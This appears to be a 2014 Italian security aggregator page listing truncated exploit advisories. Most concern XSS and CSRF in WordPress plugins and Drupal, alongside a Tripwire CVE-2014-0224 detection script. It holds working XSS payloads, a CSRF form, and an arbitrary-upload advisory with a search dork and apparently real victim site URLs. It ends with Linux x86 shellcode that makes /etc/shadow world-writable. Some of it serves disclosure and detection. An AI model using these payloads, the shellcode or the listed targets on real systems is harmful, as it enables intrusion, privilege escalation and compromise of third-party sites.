WordPress Random Banner 1.1.2.1 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress random-banner.1.1.2.1 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/random-banner/
 
# Software Link :  
http://downloads.wordpress.org/plugin/random-banner.1.1.2.1.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<input placeholder="Link for that image"  type="text" size="25"  
name="buffercode_RBanner_url_banner1" value="<?php echo  
get_option('buffercode_RBanner_url_banner1') ?>" />
 
 
######################
 
Exploit...

Leggi il seguito »

WordPress Custom Banners 1.2.2.2 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/custom-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<table class="form-table">
  <tr valign="top">
    <th scope="row"><label for="custom_banners_registered_name">Email  
Address</label></th>
    <td><input type="text" name="custom_banners_registered_name"...

Leggi il seguito »

WordPress Bannerman 0.2.4 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/bannerman/
 
# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/options-general.php?page=bannerman
 
######################
 
Exploit Code:
 
<html>
<body>
<form name="post_form" action="http://localhost/wp-admin/options-general.php?page=bannerman" method="post">
<input type='hidden' name="bannerman_background"...

Leggi il seguito »

WordPress ml-slider 2.5 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress ml-slider 2.5 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/ml-slider
 
# Software Link : downloads.wordpress.org/plugin/ml-slider.2.5.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/admin.php?page=metaslider&id=1[xss]
 
 
# Exploit:  
http://localhost/wp-admin/admin.php?page=metaslider&id=1"/><script>alert(1);</script>
 
#####################
 
Discovered By : ACC3SS
 
#####################

(4)

...

Leggi il seguito »

Drupal 5 / 6 / 7 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
Hi,
 
There is a persistent XSS in Drupal versions 5.x, 6.x and 7.x ( I have not
yet tested Drupal 8.x due to not being fully released ).
 
The function which is vulnerable is the watchdog() function, where the
$message parameter does not get sanitized and you can pass through
arbitrary code to be executed on the clients browser.
 
This can be exploited if a module/theme/hook call directly calls the
watchdog function. You could pass in a simple:
<script>alert(document.domain);</script> or whatever payload you wish.
 
For example, you could hijack the admin's browser using something like BeEF
framework or similar tools.
 
A simple way to fix this bug would be to wrap the $message htmlentities().
 
Thanks.
 
Richard...

Leggi il seguito »

WordPress Simple Share Buttons Adder 4.4 CSRF / XSS

1 luglio 2014 - Fonte: http://www.mondounix.com
Details
================
Software: Simple Share Buttons Adder
Version: 4.4
Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P)
 
Description
================
CSRF and stored XSS in Simple Share Buttons Adder 4.4
 
Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
 
 
Proof of concept
================
If a logged-in administrator user clicks...

Leggi il seguito »

Tripwire VERT CVE-2014-0224 Detection Tool v0.3

24 giugno 2014 - Fonte: http://www.mondounix.com
#!/bin/python
 
import sys
import socket
import time
import struct
 
if len(sys.argv)<2:
    print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
    quit()
else:
    strHost = sys.argv[1]
    if len(sys.argv)>2:
        try:
            iPort = int(sys.argv[2])
        except:
            print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3\nUsage: %s <host> [port=443]" % (sys.argv[0])
            quit()
    else:
        iPort = 443
 
print "***CVE-2014-0224 Detection Tool v0.3***\nBrought to you by Tripwire...

Leggi il seguito »

jQuery PHP Arbitrary Upload

24 giugno 2014 - Fonte: http://www.mondounix.com
[+] Arbitrary Upload on jQuery/PHP
 
[+] Date: 23/06/2014
 
[+] Risk: High
 
[+] CWE Number : CWE-264
 
[+] Author: Felipe Andrian Peixoto
 
[+] Vendor Homepage: http://rafaelcouto.com.br/upload-dinamico-com-php-jquery/#sthash.uVv21WU9.dpuf
 
[+] Contact: felipe_andrian@hotmail.com
 
[+] Tested on: Windows 7 and Linux
 
[+] Dork: "Upload dinâmico com jQuery/PHP"
 
[+] Exploit : http://host/patch/upload.php
 
[+] PoC: 
 
http://www.agendavisual.com/php/uploads_multiplos_1_modific/upload.php
http://www.agendavisual.com/php/uploads_multiplos_1_modific/uploads/e3b334538b7fc18a74286412bc388010.txt
 
http://lagodoy.no-ip.biz/projetos/lagodoy/upload_dinamico/upload.php
http://lagodoy.no-ip.biz/projetos/lagodoy/upload_dinamico/uploads/03cd4c9a05c8b2a4b2ede68a7b4a5fdb.txt
 
http://estatistica.br/caem/mostra2013/formularios/upload_comprovante.php
http://estatistica.br/caem/mostra2013/formularios/uploads/573437f23846bacf89c7e37193cfd224.txt

...

Leggi il seguito »

Linux/x86 chmod 0777 /etc/shadow Polymorphic Shellcode

24 giugno 2014 - Fonte: http://www.mondounix.com
/*
; Title:    chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes
; Platform: linux/x86
; Date:     2014-06-22
; Author:   Osanda Malith Jayathissa (@OsandaMalith)
 
section .text
  global _start
 
_start:  
  mov ebx, eax
  xor eax, ebx
  push dword eax
  mov esi, 0x563a1f3e
  add esi, 0x21354523
  mov dword [esp-4], esi
  mov dword [esp-8], 0x68732f2f
  mov dword [esp-12], 0x6374652f
  sub esp, 12
  mov    ebx,esp
  push word  0x1ff
  pop    cx
  mov    al,0xf
  int    0x80
 
*/
 
#include <stdio.h>
#include <string.h>
 
unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";
 
int
main()...

Leggi il seguito »